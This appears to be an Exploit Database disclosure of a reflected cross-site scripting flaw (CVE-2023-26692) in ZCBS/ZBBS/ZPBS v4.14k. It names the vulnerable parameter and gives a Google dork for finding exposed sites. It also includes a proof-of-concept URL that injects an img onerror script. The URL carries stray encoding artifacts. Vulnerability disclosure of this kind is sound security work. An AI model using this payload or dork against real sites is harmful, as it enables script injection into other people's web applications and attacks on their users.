ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)
Author: Abdulaziz Saad type: webapps platform: cgi port: date_added: 2023-04-08 date_updated: 2023-04-08 verified: 0 codes: CVE-2023-26692 tags: aliases: screenshot_url: application_url: raw file: 51347.txt
# Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS) # Date: 2023-03-30 # CVE: CVE-2023-26692 # Exploit Author: Abdulaziz Saad (@b4zb0z) # Vendor Homepage: https://www.zcbs.nl # Version: 4.14k # Tested on: LAMP, Ubuntu # Google Dork: inurl:objecten.pl?ident=3D --- [#] Vulnerability : `$_GET['ident']` [#] Exploitation : `https://localhost/cgi-bin/objecten.pl?ident=3D%3Cimg%20src=3Dx%20onerror= =3Dalert(%22XSS%22)%3E`